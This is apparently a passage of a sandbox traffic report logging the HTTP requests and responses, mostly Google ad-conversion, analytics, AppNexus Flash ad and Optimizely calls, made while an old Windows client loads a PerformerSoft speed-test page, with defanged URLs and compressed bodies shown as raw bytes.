User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.googleadservices.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"<br>
Date: Sat, 09 Aug 2014 02:05:11 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 302 Found..P3P: policyref="hXXp://VVV.googleadservices.<br>com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC".<br>.Date: Sat, 09 Aug 2014 02:05:11 GMT..Pragma: no-cache..Expires: Fri, <br>01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, must-revalidate..Lo<br>cation: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversio<br>n/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value<br>=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&<br>u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&<br>url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIV<br>AgAAAB0CAAAA&ct_cookie_present=false&convclickts=0..Content-Type: text<br>/html; charset=UTF-8..X-Content-Type-Options: nosniff..Content-Encodin<br>g: gzip..Server: cafe..Content-Length: 76..X-XSS-Protection: 1; mode=b<br>lock..Alternate-Protocol: 80:quic..............(....I.O.T(...I.UJJL.N/<br>./.K.M.../.*)J. .H,J. Q......R`....h.?.....</pre><<< skipped >>></font><br><br
<font color="red">GET /analytics.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Fri, 08 Aug 2014 16:35:01 GMT<br>
Expires: Sat, 09 Aug 2014 04:35:01 GMT<br>
Last-Modified: Thu, 31 Jul 2014 23:23:53 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: text/javascript<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Server: Golfe2<br>
Content-Length: 11119<br>
Age: 34205<br>
Cache-Control: public, max-age=43200<br>
Alternate-Protocol: 80:quic<br><pre>...........}{W.....|......a...N..Eo..[K.!..%.RB.:..B......d;...<..5<br>C........'........\....Q2T#.||..|t>...a&N...P..E,.I.}..'.i&....N[..<br>....".n.$....2<M..(...N.B..<OP`..~."/M....O..<-3.....S.ne.8..<br>s..SO\.:I...?e..G)r.(.&2K^..s...}M...,K..4C...{f.h$.NG...B............<br>z"[email protected]:[email protected]#9.........:....D^<br>..`N..A..!..F..>.Y.a....4.G..... .$.S.^D...5...{...m..][email protected]><br>;.5e...2.b1......{..z..{..z..L...p...HRG....F.'>b.c...>0...#....<br>.......2I..I..h{.2.&....-.t[.i..b..<.8";q7..g&w/*U<..>U.QY...<br>R..s.m.Z-....V..3.O.#.T...n.........8hQS.........z....W..w.....?8|....<br>.O..|.&c.............t.M/......k..........^.......m=hY..;.....5.....89<br>o|...%-.R....a*{..E.m....,............l........w~w.lt...y........_.h..<br>..... ..VW.....h.\.*l....d..i. .....z.I*.....R7.-;..Z..;... Y..n...jO.<br>....... ...u..D..#h..%[email protected]... .K.......R>.c.r.h._.........<br>kO.]-m.Yy..E3.c.....'........._&.....%tp...72.Z...)..O.d.... .*T*:h"/.<br>.:..ju....=5..f.....7....l&......ir>.H.;..j.oP.:....Y......4h...*..<br>......U...D .....B..d...P.L ivY...1S.....o..L.]...}....N.....q7....?K@<br>....~V...?..g...;.....S..y..........7[*.B..:..q.s.m-.....2....W]...X:.<br>eT...$i..-...w...<^=^].w&t..::\o....R.f}c..X....H..>...j".....A.<br>...i........]/..*F}).MmD...ju8..*H.....B ...<.6..#.*.......>..-.<br>."..%....n% ....6.n.-z8..D.:......Buz....uAB B....$y.0W.....P~....s...<br>.U.%....]b.&u....O4x.....W..ykT...`.k.}7M{..m.7.V...2M. ....7f.:.....6<br>[o.....'c,.=..<.b.....U..8..0.Z.D'b/.#5..)..\w....GO~.a<..O.</pre><<< skipped >>></font><br><br><font color="red">GET /collect?v=1&_v=j24&a=1357867663&t=pageview&_s=1&dl=http://VVV.performersoft.com/speedtest/?cid=4751&ul=en-us&de=utf-8&dt=PerformerSoft Speed Test&sd=32-bit&sr=1276x846&vp=1276x697&je=0&fl=11.6 r602&_u=ME~&cid=476553240.1407549896&tid=UA-42277600-10&z=1548146158 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Pragma: no-cache<br>
Expires: Mon, 07 Aug 1995 23:30:00 GMT<br>
Access-Control-Allow-Origin: *<br>
Last-Modified: Sun, 17 May 1998 03:00:00 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: image/gif<br>
Date: Fri, 08 Aug 2014 04:49:02 GMT<br>
Server: Golfe2<br>
Content-Length: 35<br>
Age: 76565<br>
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate<br>
Alternate-Protocol: 80:quic<br><pre>GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..<br>Expires: Mon, 07 Aug 1995 23:30:00 GMT..Access-Control-Allow-Origin: *<br>..Last-Modified: Sun, 17 May 1998 03:00:00 GMT..X-Content-Type-Options<br>: nosniff..Content-Type: image/gif..Date: Fri, 08 Aug 2014 04:49:02 GM<br>T..Server: Golfe2..Content-Length: 35..Age: 76565..Cache-Control: priv<br>ate, no-cache, no-cache=Set-Cookie, proxy-revalidate..Alternate-Protoc<br>ol: 80:quic..GIF89a.............,...........D..;</font>....</pre></font><br><br><font color="red">GET /ga.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Date: Fri, 08 Aug 2014 21:05:21 GMT<br>
Expires: Sat, 09 Aug 2014 09:05:21 GMT<br>
Last-Modified: Thu, 31 Jul 2014 23:23:53 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: text/javascript<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Server: Golfe2<br>
Content-Length: 15983<br>
Age: 17990<br>
Cache-Control: public, max-age=43200<br>
Alternate-Protocol: 80:quic<br><pre>...........}k[....w~...f. .$..&.y....--..M.......8.........$[NB.>.&<br>lt;..".gt..F....O.".%C..}.....r(.H~.x..\....f,...0..{.=.<Hev....$c.<br>.z.;..].'<.d......4.,.J....=..d<\.~2.$<..i..h>............<br> .................x.$c.].......a.._.L\:l...d..k.0.<...y..vX7p......<br>.e...&p..,...]...N:....A.4KF..d......_.3H.......1.].u.d.H......X......<br>hp..!.......Lb.?1.A. ...2. ...........F..=.4.zA..[.`.8....a.aw:..~...k<br>>.A./z..'..H.w....^..J...I.....1.....[y?p~&=..Kl...V..y.....`W.^z..<br>[email protected]. u.Y...!..R.h.F..`./>5...*{...(..:A.5Ob;...r.&.E..J.<br>WVV.;..E2.*O....8^...:z.xE..J.R%.....Y.<!.J...Z.yI..b..5.3......Tep<br>......g.f..W...<......:n.....}.Y.[1jL....v....W.8..#w...t..........<br>Qr.zv.1.t).~...*..r.Z...6. [email protected]*............~.B...s.<br>....\.]6.7U...Tp=......T.`<..........AN..nL.....(:...r.K3...5.r1p..<br>A.|.e\\.ze...:04.....7......F.f..j...R....c...C^t.Z.Dp...A.Ta..e......<br>...[[email protected]|..w0,|.K9..$.o.<br>b3....b<....L..........S.;6..... ..I....$\.S..sdu..;......t..g..N. <br>....i....:>...N..>...U...JG.."..X....B.qh.E....(*..#. .o.. A".u{<br>{.;.......W.....kM.c="h,.(.=.....%..\[email protected]\x..5......\.L...M"tf.GM<br>...X[.QU......_.lH......n@91........[...f>F."..QD.....&.s...Ka....]<br>.Ux.{=O....(.".;..".G..aR\Y.WVtX....;k..h._.O..b...2....{[email protected].)2.<br>..xD7.4.T...i.v.RC`.m.8.\....J...To..sss.....p*.....3.WH...5X...k...y.<br>`\ ....&1..j"?.D.W.}.;D:d.F....p#... 
......d...T..jU7n.;-.h._..E..`-`w<br>..a..@}.!...]...Pk..j.k.|.9}H|.......O.C..Q.....0a..,.{2.'oJ..n...</pre><<< skipped >>></font><br><br><font color="red">GET /__utm.gif?utmwv=5.5.4&utms=1&utmn=183511789&utmhn=VVV.performersoft.com&utmcs=utf-8&utmsr=1276x846&utmvp=1260x697&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=PerformerSoft Speed Test&utmhid=1357867663&utmr=-&utmp=/3850509559/goal&utmht=1407549900552&utmac=UA-16085399-2&utmcc=__utma=125033355.476553240.1407549896.1407549901.1407549901.1;+__utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=DACAAAAAAAAAAAAAAAAB~ HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google-analytics.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Pragma: no-cache<br>
Expires: Wed, 19 Apr 2000 11:43:00 GMT<br>
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Type: image/gif<br>
Date: Thu, 31 Jul 2014 21:10:32 GMT<br>
Server: Golfe2<br>
Content-Length: 35<br>
Age: 708879<br>
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate<br>
Alternate-Protocol: 80:quic<br><pre>GIF89a.............,...........D..;HTTP/1.1 200 OK..Pragma: no-cache..<br>Expires: Wed, 19 Apr 2000 11:43:00 GMT..Last-Modified: Wed, 21 Jan 200<br>4 19:51:30 GMT..X-Content-Type-Options: nosniff..Content-Type: image/g<br>if..Date: Thu, 31 Jul 2014 21:10:32 GMT..Server: Golfe2..Content-Lengt<br>h: 35..Age: 708879..Cache-Control: private, no-cache, no-cache=Set-Coo<br>kie, proxy-revalidate..Alternate-Protocol: 80:quic..GIF89a............<br>.,...........D..;..</pre></font><br><br
<font color="red">GET /pagead/conversion/983437618/?random=1407549900333&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.googleadservices.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"<br>
Date: Sat, 09 Aug 2014 02:05:11 GMT<br>
Pragma: no-cache<br>
Expires: Fri, 01 Jan 1990 00:00:00 GMT<br>
Cache-Control: no-cache, must-revalidate<br>
Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 76<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><pre>............(....I.O.T(...I.UJJL.N/./.K.M.../.*)J. .H,J. Q......R`....<br>h.?...HTTP/1.1 302 Found..P3P: policyref="hXXp://VVV.googleadservices.<br>com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC".<br>.Date: Sat, 09 Aug 2014 02:05:11 GMT..Pragma: no-cache..Expires: Fri, <br>01 Jan 1990 00:00:00 GMT..Cache-Control: no-cache, must-revalidate..Lo<br>cation: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversio<br>n/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&valu<br>e=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276<br>&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0<br>&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAI<br>VAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0..Content-Type: tex<br>t/html; charset=UTF-8..X-Content-Type-Options: nosniff..Content-Encodi<br>ng: gzip..Server: cafe..Content-Length: 76..X-XSS-Protection: 1; mode=<br>block..Alternate-Protocol: 80:quic..............(....I.O.T(...I.UJJL.N<br>/./.K.M.../.*)J. .H,J. Q......R`....h.?.....</pre><<< skipped >>></font><br><br
<font color="red">GET /p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Apache<br>
ETag: "03cacc7d05899aea99056522d1bc9eb6:1405419852"<br>
Last-Modified: Tue, 15 Jul 2014 10:24:07 GMT<br>
Accept-Ranges: bytes<br>
Content-Length: 50818<br>
Content-Type: application/x-shockwave-flash<br>
Date: Sat, 09 Aug 2014 02:05:09 GMT<br>
Connection: keep-alive<br><pre>CWS.....x.|..TSA.5...(.J.(HGz...Mz....:.;...... ....U .....J....@:.x..<br>..w...Y.d...N.............?.0;.=.........h.~....p9}..p[OKW.@F..@.\..4.<br>.in2...`.cag..}..-.....|,<...n2.pss?"...,.rv...2.......J:.9!..M..H:<br>.8......30.s.......3.3.HH.... .....-..F.H.p.H...../.....2.r2^..:2r:..&<br>gt;. .p......t..@FAIE*S...Bv..?....B. .t..<..M|_.J>O..SP/.......<br>.TN..1J....qF...3..G.o..5. .....$....W..O... 9=......).#......... '..#<br>........4.......k4|/.)...x........`..~.|........<.W...>38U3.><br>....oM..i...c..d|D..:.J..?.."..xn...Yz. ......O)HO.!y.N....-..-.3. .x.<br>..A.xG.........-..K_Z.>....xe...]2.u.(.3.....g....]I.2.{.Fk..f`!. )<br>w.O*[email protected].`....dR.....m.....C4F..]..|8...8....l....F.....(....|x<br>.O...X@k6.\.../e..O....4....d"6..{..E..5C.'=N.?!.5...j%..V..v n....NU.<br>(.qr.E.%..E1.U..!%.y.t..4....S8...t.F7.v.01..lC....c.......s.N..'bv.^.<br>1.e4y..Z.:.............17.......Bg."[email protected]..].....6M4o..RH..T..........<br>..<.W.4.e..&4C..)#..:<.o...1.v.7Yg.......{......q..........13aQ.<br>#)OP.a,...._D...{...\9......P..VT..;V........8..b.....{......*.T)4....<br>z./.....4.?Q.7.B...*O)[....*.G....Z.'/...w....}}s_?....wM.,.".....&...<br>Y......l&....|...F.z^M.1.J...I.4).....h._..V....\.#..u[.._Z....^T..k.2<br>c}.(........!*..2.D>.p..=u{......1_0...;..hI......Y....U.......C9..<br>.....5.~a.$..y....%.....Ry..7..{..u.....{17..y..Sv/....k..P.u..i..q..q<br>...,..;..[...:.-........V...W\.?}j...3r.R..X...%..W[.z....g.fc..T...S.<br>Zf;[email protected][1....Z..~..$!.r.u.A..8.J.../W_i./.......0.....<br>.i....o..%7.?..yj..!..^..H{J.....\D..a.4..[7..{.l*u.>.. Vf.....</pre><<< skipped >>></font><br><br
<font color="red">GET /speedtest/media/body-bg.jpg HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:07 GMT<br>
Content-Type: image/jpeg<br>
Content-Length: 113687<br>
Last-Modified: Thu, 07 Mar 2013 07:57:00 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5138484c-1bc17"<br>
Expires: Sat, 09 Aug 2014 03:05:07 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br><font color="red">GET /speedtest/media/PaUkffsP_bigger.gif HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.performersoft.com<br>
Connection: Keep-Alive<br>
Cookie: cid=4751; optimizelySegments={"174149309":"ie","173002992":"false","174179738":"direct","335502688":"true"}; optimizelyEndUserId=oeu1407549893958r0.050962674514707096; optimizelyBuckets={}; optimizelyPendingLogEvents=[]; _ga=GA1.2.476553240.1407549896; norjs=1<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: nginx<br>
Date: Sat, 09 Aug 2014 02:05:08 GMT<br>
Content-Type: image/gif<br>
Content-Length: 5761<br>
Last-Modified: Thu, 07 Mar 2013 10:03:59 GMT<br>
Connection: keep-alive<br>
Keep-Alive: timeout=2<br>
ETag: "5138660f-1681"<br>
Expires: Sat, 09 Aug 2014 03:05:08 GMT<br>
Cache-Control: max-age=3600<br>
Set-Cookie: norjs=1; path=/<br>
Accept-Ranges: bytes<br><<< skipped >>></font><br><br>
<font color="red">GET /cse/intl/en/images/google_custom_search_watermark.gif HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.google.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Type: image/gif<br>
Last-Modified: Wed, 08 Feb 2012 18:07:38 GMT<br>
Date: Fri, 08 Aug 2014 04:46:13 GMT<br>
Expires: Sun, 10 Aug 2014 04:46:13 GMT<br>
X-Content-Type-Options: nosniff<br>
Server: pfe<br>
Content-Length: 2024<br>
X-XSS-Protection: 1; mode=block<br>
X-Frame-Options: SAMEORIGIN<br>
Age: 76739<br>
Cache-Control: public, max-age=172800<br>
Alternate-Protocol: 80:quic<br><<< skipped >>></font><br><br><font color="red">GET /ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896 HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Connection: Keep-Alive<br>
Host: VVV.google.com<br>
<br>
</font><br><font color="blue">HTTP/1.1 302 Found<br>
Location: hXXp://VVV.google.com.ua/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y<br>
Cache-Control: private, max-age=43200<br>
Date: Sat, 09 Aug 2014 02:05:12 GMT<br>
Expires: Sat, 09 Aug 2014 02:05:12 GMT<br>
Content-Type: text/html; charset=UTF-8<br>
X-Content-Type-Options: nosniff<br>
Server: adclick_server<br>
Content-Length: 701<br>
X-XSS-Protection: 1; mode=block<br>
Alternate-Protocol: 80:quic<br><<< skipped >>></font><br><br>
<font color="red">GET /p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf?clickTAG=http://nym1.ib.adnxs.com/click?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYgb0cIAA./referrer=http%3A%2F%2FVVV.performersoft.com%2Fspeedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popmog.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%3Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU. HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Apache<br>
ETag: "03cacc7d05899aea99056522d1bc9eb6:1405419852"<br>
Last-Modified: Tue, 15 Jul 2014 10:24:07 GMT<br>
Accept-Ranges: bytes<br>
Content-Length: 50818<br>
Content-Type: application/x-shockwave-flash<br>
Date: Sat, 09 Aug 2014 02:05:09 GMT<br>
Connection: keep-alive<br><<< skipped >>></font><br><br><font color="red">GET /ANX_async_usersync.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.adnxs.com<br>
Connection: Keep-Alive<br>
Cookie: uuid2=7887817462876364047; sess=1; icu=ChII_-wYEAoYAiACKAIw1IOWnwUQ1IOWnwUYAQ..; anj=dTM7k!M4.NCxrEQDgEREg0D`mgx!ea#uqzhcb7D(5Cs1%<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Server: Apache<br>
ETag: "e3de0e76c13e81e3b0683dac240498eb:1377552334"<br>
Last-Modified: Mon, 26 Aug 2013 21:25:34 GMT<br>
Accept-Ranges: bytes<br>
Content-Type: application/x-javascript<br>
Vary: Accept-Encoding<br>
Content-Encoding: gzip<br>
Content-Length: 509<br>
Date: Sat, 09 Aug 2014 02:05:10 GMT<br>
Connection: keep-alive<br><<< skipped >>></font><br><br>
<font color="red">GET /js/130131868.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: cdn.optimizely.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
Content-Encoding: gzip<br>
Accept-Ranges: bytes<br>
Cache-Control: max-age=120<br>
Content-Type: text/javascript<br>
Date: Sat, 09 Aug 2014 02:05:04 GMT<br>
Etag: "b49f06288845e4dd4b6f014e890160ac"<br>
Last-Modified: Tue, 05 Aug 2014 06:46:29 GMT<br>
Server: ECS (dca/FEAB)<br>
Timing-Allow-Origin: *<br>
Vary: Accept-Encoding<br>
x-amz-id-2: rxUZeSGOxkZrChX9 Zt8gC5ZzEmnMaRoNTONdeh8R6oO9rbgeL6YTNnxbmHlgu74<br>
x-amz-request-id: EE083D5DBBB51256<br>
X-Cache: HIT<br>
Content-Length: 48323<br><<< skipped >>></font><br><br>
<font color="red">GET /ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956 HTTP/1.1<br>
